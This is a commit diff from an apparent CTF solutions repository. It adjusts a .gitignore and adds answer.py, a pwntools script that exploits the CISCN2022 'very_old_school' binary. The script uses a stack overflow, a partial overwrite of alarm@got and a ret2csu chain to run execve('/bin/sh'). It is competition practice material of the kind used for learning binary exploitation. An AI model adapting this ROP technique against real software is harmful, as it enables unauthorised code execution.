ROP/very_old_school published in CISCN2022-NC-Regional

.gitignore

@@ -2,6 +2,10 @@
 .gdb_history
 peda*.txt
 
+# IDA
+!*.i64
+!*.so.i64
+
 # Prerequisites
 *.d
 
@@ -29,7 +33,7 @@ peda*.txt
 # Shared objects (inc. Windows DLLs)
 *.dll
 # *.so
-*.so.*
+# *.so.*
 *.dylib
 
 # Executables

ROP/very_old_school/answer.py

@@ -0,0 +1,35 @@
+#!/usr/bin/env python2
+from pwn import *
+from LibcSearcher import *
+from struct import pack
+import os, base64, math, time
+context(arch = "amd64",os = "linux", log_level = "debug")
+
+p = process(['./very_old_school'], env={"LD_PRELOAD":"./libc-2.27.so"})
+elf = ELF('./very_old_school')
+
+gdb_command = ""
+gdb.attach(p, gdb_command)
+time.sleep(1)
+
+bin_sh_str = 0x601500
+main_sym = 0x400540
+read_plt = elf.plt['read']
+alarm_got = elf.got['alarm']
+pop_rsi_r15_ret = 0x4005e1
+csu_pop_regs = 0x4005da
+call_gadget = 0x4005c0
+
+payload = "a" * 0x48 + \
+    p64(pop_rsi_r15_ret) + p64(alarm_got) + p64(0) + p64(read_plt) + \
+    p64(pop_rsi_r15_ret) + p64(bin_sh_str) + p64(0) + p64(read_plt) + \
+    p64(csu_pop_regs) + p64(0) * 2 + p64(alarm_got) + p64(bin_sh_str) + p64(0) * 2 + p64(call_gadget)
+
+p.send(payload.ljust(0x100, '\x00'))
+raw_input()
+p.send(p8(0x15)) # Point
+raw_input()
+p.send("/bin/sh\x00".ljust(59, 'a')) # 59 is Sys_execve No.
+
+
+p.interactive()